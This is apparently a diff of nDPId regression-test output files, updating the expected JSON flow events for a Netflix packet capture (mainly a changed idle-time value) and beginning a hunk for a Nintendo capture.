{"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","packets-captured":6999,"packets-processed":6999,"total-skipped-flows":0,"total-l4-data-len":5686857,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":60,"total-detection-updates":52,"total-updates":0,"current-active-flows":0,"total-active-flows":61,"total-idle-flows":61,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":408,"global_ts_msec":1484319120726} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/nintendo.pcap.out b/test/results/nintendo.pcap.out index 4ea0b3a55..7d501ee87 100644 --- a/test/results/nintendo.pcap.out +++ b/test/results/nintendo.pcap.out @@ -15,10 +15,10 @@ 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1500731320971,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320971,"pkt":"fLuKifuEAA6OGXEMCABFAAC497sAADIRdTNbCPMjwKgMcsEYy5cApCSHMquYZAJwBDw1LZb\/EXOjSMMnhE7iZD46YMnDknY2Toj8H3hexFk8t\/NxtrnGBe7\/azeV+ylrxOZLEJSeqtaVZpj8qkFUmEqDrAokbYC5tpC2hu85m1Gapy+z4MYRc6NIwyeETuJkPjpgycOS4O1pGafPZccfGHcxxjvnUp7EdqfBF4phVhM5G67auDF2qW+tEyxBQPI1F2LvuWv4"} 